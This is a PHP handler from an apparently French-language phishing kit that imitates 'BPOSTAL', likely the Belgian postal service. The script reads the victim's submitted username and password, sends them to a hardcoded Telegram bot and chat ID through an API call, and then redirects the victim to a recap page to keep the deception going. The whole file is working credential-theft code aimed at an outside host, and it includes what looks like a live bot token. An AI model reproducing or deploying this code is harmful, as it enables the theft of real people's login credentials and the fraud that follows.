<?php

session_start();

$message = '[🆘] +1 LOG BPOSTAL [🆘]' . "\r\n\n";

$message .= '🚀 USER  : ' . $_POST['identifiant'] . " \r\n\n";
$message .= '🚀 MOT DE PASSE : ' . $_POST['password'] . " \r\n\n";

$_SESSION['login']=$_POST['login'];
$_SESSION['tel']=$_POST['tel'];

$url = "https://api.telegram.org/bot8197197077:AAE_aI-I5w5XWztBupQJbeb44L_TpeUWQFM" . $token . "/sendMessage?chat_id=-4722815995" . $chat_id . "&text=" . urlencode($message);

file_get_contents($url);

// Utilisation de JavaScript pour la redirection
echo '<script type="text/javascript">';
echo 'window.location.href = "../../recap.php";';
echo '</script>';

?>
